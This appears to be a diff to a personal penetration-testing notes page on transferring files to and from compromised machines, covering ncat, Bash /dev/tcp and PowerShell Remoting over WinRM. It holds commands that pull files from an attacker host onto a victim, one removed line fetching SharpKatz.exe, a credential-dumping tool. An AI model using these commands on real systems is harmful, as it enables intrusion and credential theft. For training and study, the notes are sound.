amandaguglieri/hackinglife/docs/transferring-files-techniques-code.md

 ncat $ipAttacker 443 --recv-only > tobesentfile.txt

-# Using /dev/tcp to Receive the File
+# If we don't have Netcat or Ncat on our compromised machine, Bash supports read/write operations on a pseudo-device file [/dev/TCP/](https://tldp.org/LDP/abs/html/devref1.html).
+Using /dev/tcp to Receive the File
-cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe
+cat < /dev/tcp/$ipAttacker/443 > received.txt
 ```

 ## PowerShell Session File Transfer

+There may be scenarios where HTTP, HTTPS, or SMB are unavailable.
+If that's the case, we can use [PowerShell Remoting](https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.2), aka WinRM, to perform file transfer operations.
+To create a PowerShell Remoting session on a remote computer, we will need administrative access, be a member of the `Remote Management Users` group, or have explicit permissions for PowerShell Remoting in the session configuration.

 PowerShell Remoting uses [Windows Remote Management (WinRM)](5985-5986-winrm-windows-remote-management.md), which is the Microsoft implementation of the [Web Services for Management (WS-Management)](https://www.dmtf.org/sites/default/files/standards/documents/DSP0226_1.2.0.pdf) protocol, to allow users to run PowerShell commands on remote computers.

-To create a PowerShell Remoting session on a remote computer, we will need administrative access, be a member of the `Remote Management Users` group, or have explicit permissions for PowerShell Remoting in the session configuration.

 Let's create an example and transfer a file from `DC01` to `DATABASE01` and vice versa.